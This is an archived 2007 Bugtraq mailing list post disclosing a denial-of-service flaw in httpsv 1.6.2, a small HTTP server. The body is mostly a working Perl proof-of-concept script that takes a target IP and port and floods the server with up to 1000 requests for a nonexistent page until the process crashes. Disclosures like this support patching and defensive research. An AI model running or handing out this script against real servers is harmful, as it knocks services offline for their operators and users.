| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 21 Jun 2007 00:55:16 -0000
From: imprili@...il.com
To: bugtraq@...urityfocus.com
Subject: HTTP SERVER (httpsv1.6.2) 404 Denial of Service
HTTP SERVER (httpsv1.6.2) 404 Denial of Services
Site: http://httpsv.sourceforge.net/
Info: If u send to the server between 40-1000 requests to nonexisting pages the process will die.
Bug Found By Prili - imprili[at]gmail.com
POC:
----
#!/usr/bin/perl
#GetOpt STD module
use IO::Socket;
use Getopt::Std;
getopts(":i:p:",\%args);
if(defined $args{i}){
$ip = $args{i};
}
if(defined $args{p}){
$port = $args{p};
}
if(!defined $args{i} or !defined $args{p}){
print "-----------------------------------------------------\n";
print "HTTP SERVER (httpsv1.6.2) 404 Denial of Service\n";
print "Site: http://httpsv.sourceforge.net/\n ";
print "Info: If u send to the server between 40-1000 requests\n";
print "to nonexisting pages the process will die.\n";
print "Found By Prili - imprili[at]gmail.com\n";
print "Usage: perl $0 -i <ip address> -p <port> \n";
print "Thanks to shinnai for the inspiration.\n";
print "-----------------------------------------------------\n";
exit;
}
$protocol = "tcp";
while ($i<=1000)
{
$request = "GET /AAAAAAA HTTP/1.0 \n\n";
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Can't connect to address!\n";
print "sending request number $i...\n";
print $socket $request;
close($socket);
$i++;
}
Powered by blists - more mailing lists